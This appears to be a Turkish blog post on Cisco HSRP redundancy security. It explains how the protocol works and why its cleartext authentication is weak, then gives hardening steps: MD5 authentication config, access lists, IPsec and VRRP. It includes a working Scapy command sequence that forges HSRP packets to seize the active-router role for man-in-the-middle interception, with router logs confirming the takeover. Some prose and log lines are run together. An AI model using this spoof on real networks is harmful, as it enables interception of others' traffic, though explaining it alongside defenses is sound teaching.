Ağ Güvenilirliği - Yedeklilik Güvenliği
Günümüz internet dünyasında ve kurumların iç ağ altyapılarında iletişiminin kesintisiz bir şekilde devam etmesi büyük önem taşımaktadır. Özellikle internet uygulamaları, ses ve video iletişimi kullanımı iletişimin kesilmemesini zaruri kılmaktadır. Bunun için ağ altyapılarında kullanılan bütün aktif cihazların yedekli olarak çalıştırılması böylece cihazlardan birinin servis dışı kalması durumunda dahi gruptaki diğer cihazın yükü alarak iletişimin kesintisiz sürmesi hedeflenmektedir. Kurum içi ağ altyapıları açısından olaya bakıldığında, ağın merkezinde 3.katmanda çalışan bir cihazın çalışamaz hale gelmesi halinde buna alternatif olarak çalışıp iletişimi kesintisiz bir şekilde devam ettirecek yedek bir cihazın varlığı gerekir.
HSRP (Hot Standby Router Protocol) aynı işi yapan birden fazla yönlendiricinin veya 3.katman ağ cihazıının son kullanıcılara bir tek ağ geçidi gibi görünmesini sağlayarak yedeklilik yapısı sağlayan Cisco’ya özgü bir protokoldür. Aynı gruptaki yönlendiricilerden bir tanesi aktif olarak yönlendirme işlemini yürütürken grubun diğer üyesi yedek olarak "standby" konumunda, aktif yönlendiriciyi takip ederek herhangi bir terslik durumunda yerine geçmek için yedekte beklemektedir. Protokol gereği cihazlar her 3 sn’de bir birbirlerine "hello"paketi gönderir. Yedek durumda olan cihaz, aktif cihazdan 10sn. içinde hiç hello paketi alamazsa kendini ağda "Active Router" olarak ilan ederek iletişimi devralır. Bundan sonra ilk durumda aktif olan cihaz yedek duruma geçer. Yapılandırma için iki cihazında üyesi olduğu ortak bir grup numarası belirlendikten sonra sanal ağ geçidi için sanal bir MAC adresi oluşturulur. Ağ kullanıcıları için sanal ağ geçidi IP adresi belirlenir. Burada asıl amaç kullanıcıların ağ geçidi olarak bu sanal IP adresini baz alması ve herhangi bir arıza veya aktif-yedek geçişlerinde arka tarafta çalışan yapının durumundan bağımsız hareket etmesini sağlamaktır. İki cihazdan hangisinin aktif hangisinin yedek olacağını ise "priority" olarak bilinen değer belirler. Varsayılanda bu değer 100 olduğu için, aktif olması istenen cihaza 100’den büyük bir değer girmek yeterlidir (0-255 arasında herhangi bir değer atanabilir). Bu değer iki cihazda da aynıysa o zaman IP adresi büyük olan cihaz aktif olarak görev yapacaktır.
HSRP grubu üyeleri birbirleri ile 224.0.0.2 multicast IP adresi ve UDP 1985 portu üzerinden haberleşirler ve varsayılanda kimlik doğrulama şifrelenmemiş şekilde yapılır. Bu durum ağda yer alan herhangi bir cihazın sadece paketleri dinleyerek yapı hakkında bilgi sahibi olmasını ve bunu baz alarak saldırı yapabilme imkanını doğurur.
Linux# scapySaldırı sonucunda mevcut ağ cihazlarının durumundaki değişim cihaz konsolundan görüldüğü üzere şu şekildedir.
Welcome to Scapy (2.0.0.10 beta)
>>> ip = IP(src='192.168.40.128', dst='224.0.0.2')
>>> udp = UDP()
>>> hsrp = HSRP(group=1, priority=255, virtualIP='192.168.40.1')
>>> send(ip/udp/hsrp, iface='eth1', inter=3, loop=1)
%HSRP-5-STATECHANGE: FastEthernet0/0 Grp 1 state Active -> SpeakBu ağ üzerindeki bütün paketler artık saldırganın üzerinden geçmekte ve bu durum saldırgana paketlere istediği gibi müdahale etme şansı vermektedir. İç ağ sızma testlerinde böyle bir saldırının kullanılması için son şekliyle yönlendirmeler doğru şekilde yapılmalı ve saldırıyı yapan makinenin ağ trafiğini kaldırabilecek güçlülükte olmasına dikkat edilmelidir.
%HSRP-5-STATECHANGE: FastEthernet0/0 Grp 1 state Speak -> Standby
Çözüm:
- Yetkilendirme: HSRP ilişkisini gerçekleyecek bütün cihazlar için yetkilendirme gerçekleştirilmeli, böylelikle yetkisiz birinin gruba dahil olması engellenmelidir. Aşağıdaki gibi MD5 ile özetlenmiş “key-string”lerle yapılan bir yapılandırma örneği yetkilendirme için kullanılabilir.
interface FastEthernet1/0Böylece gönderilen paketler gözardı edilebilir, düşürülebilir.
ip address 192.168.40.2 255.255.255.0
duplex auto
speed auto
standby 1 ip 192.168.40.1
standby 1 preempt
standby 1 authentication md5 key-string HSRP_PAROLA
*Mar 1 02:11:14.650: %HSRP-4-BADAUTH: Bad authentication from 192.168.40.128, group 1, remote state Speak
- Gelen HSRP trafiğini sınırlandırmak için erişim kontrol listeleri kullanılabilir.
- Gruba dahil olacak cihazlar arasında IPSEC tünel kurularak HSRP paketlerinin bu tünelden geçmesi sağlanabilir.
- HSRP yerine AH(Authentication Header) içeren VRRP protokolü kullanılabilir.
Referanslar:
[1] Hacking Exposed Cisco Networks: Cisco Security Secrets & Solutions[2] http://isc.sans.edu/diary.html?storyid=10120
0 yorum → "Ağ Güvenilirliği - Yedeklilik Güvenliği"
Yorum Gönder